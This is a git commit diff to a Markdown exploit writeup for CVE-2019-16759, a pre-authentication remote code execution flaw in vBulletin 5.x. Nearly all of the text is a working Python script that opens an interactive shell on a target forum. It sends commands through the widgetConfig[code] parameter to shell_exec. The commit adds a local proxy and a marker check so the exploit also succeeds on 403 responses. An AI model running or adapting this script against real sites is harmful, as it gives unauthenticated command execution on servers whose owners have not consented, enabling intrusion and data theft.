Update CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md

fix when status code was 403
2025-06-20 09:50:19 +00:00 · 2019-09-26 20:03:06 +08:00 · 2019-09-26 20:03:06 +08:00 · 1d539ee2b7
commit 1d539ee2b7
parent 43e577f84e
1 changed files with 11 additions and 6 deletions
--- a/exploit.md
+++ b/exploit.md
@ -45,21 +45,26 @@ import sys
 if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

+proxies ={
+     "http":"http://127.0.0.1:8080/"
+}
 params = {"routestring":"ajax/render/widget_php"}

 while True:
     try:
-          cmd = raw_input("vBulletin$ ")
-          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
-          r = requests.post(url = sys.argv[1], data = params)
-          if r.status_code == 200:
-               print r.text
+          cmd = raw_input(">>>Shell= ")
+          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
+          r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
+          if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
+               print
+               print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))
+
 ```
 ### 复现截图